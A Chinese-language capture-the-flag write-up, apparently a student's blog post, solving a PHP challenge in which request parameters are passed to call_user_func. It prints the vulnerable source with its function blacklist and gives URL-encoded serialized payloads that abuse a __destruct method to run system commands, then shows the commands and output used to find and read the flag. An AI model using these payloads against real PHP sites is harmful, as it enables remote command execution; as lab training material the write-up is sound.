Warning : date(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone. in /var/www/html/index.php on line 24
2025-07-09 05:06:31 am
不太明白timezone是什么。 查了一下原来是时区设置,现在使用的是默认时区UTC,与当前时间不符。可以通过修改配置文件中的data.timezone或者调用date_default_timezone_set()函数设置时区。
另外网页还会自动刷新,但是我仍不知道解题思路,找找有没有其他线索...
通过抓包看到有POST传参:
func=date&p=Y-m-d+h%3Ai%3As+a
func应该是指调用的函数吧,p应该是指参数,作用是获得当前时间,确实页面响应中有时间。
难道是利用这个修改时区,尝试一下修改参数:
func=date_default_timezone_set&p='Asia/Shanghai'
页面不再出现报错,说明函数执行成功了。
那如何利用该漏洞拿到flag呢?
func=scandir&p='.'
返回警告scandir('.'): failed to open dir: No such file or directory in /var/www/html/index.php
func=scandir&p='../'
func=scandir&p='DIR'
func=file_get_contents&p='index.php'
仍然是相同报错。直接看答案吧...
我天!居然是func=file_get_contents&p=index.php,参数不加引号!对啊本来func=date&p=Y-m-d+h%3Ai%3As+a就没用引号。func=date_default_timezone_set&p='Asia/Shanghai'成功运行又是为什么呢?func=scandir&p=.没有返回结果(看了源码就会知道因为该函数返回数组,源码限制只输出字符串类型返回值)
php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>审计源码可以看到反序列化漏洞,class Test中有魔术方法__destruct,并且变量func和p的值没有过滤。思路就是传入的参数fun为unserials,p为序列字符串。
试试看p->fun=eval&p->p=_POST[0]:
O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A8%3A%22_POST%5B0%5D%22%3Bs%3A4%3A%22func%22%3Bs%3A4%3A%22eval%22%3B%7D
出现报错: call_user_func() expects parameter 1 to be a valid callback, function 'eval' not found or
invalid function name in <b>/var/www/html/index.php。
查阅资料后才知道在PHP 里
eval()是一个语言结构,并非普通函数,所以不能把字符串'eval'作为回调函数名直接传给call_user_func(),可以考虑将其封装成function($code) {eval($code);
}
但是仍然报错。那用system呢?
p->fun=system&p->p=_POST[0]
func=unserialize
&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A8%3A%22_POST%5B0%5D%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D
&0=ls/
没有任何输出。应该是语法错误。问题在于'$_POST[0]'会直接作为字符串传给system当作系统命令执行,并不会接受POST传参。
所以只能麻烦一点,用反序列字符串作为中间过渡进行命令执行。
执行system['ls']的输出是 bg.jpg index.php index.php 因为该命令显示当前目录中的文件。
执行system['ls /'] 查看根目录,但是并未找到flag字样。
执行system['find / -name"*flag*"']
/proc/sys/kernel/acpi_video_flags
/proc/sys/net/ipv4/fib_notify_on_flag_change
/proc/sys/net/ipv6/fib_notify_on_flag_change
/proc/kpageflags
/tmp/flagoefiu4r93
/sys/devices/pnp0/00:04/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS15/flags
...........................................
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/virtual/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/usr/lib/x86_64-linux-gnu/perl/5.20.2/bits/waitflags.ph
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/usr/include/linux/tty_flags.h
出现贼多,不过以我对linux文件目录命名规则浅薄的理解,flag大概率在tmp中
执行system['cat /tmp/flagoefiu4r93'] 嘿嘿拿到了。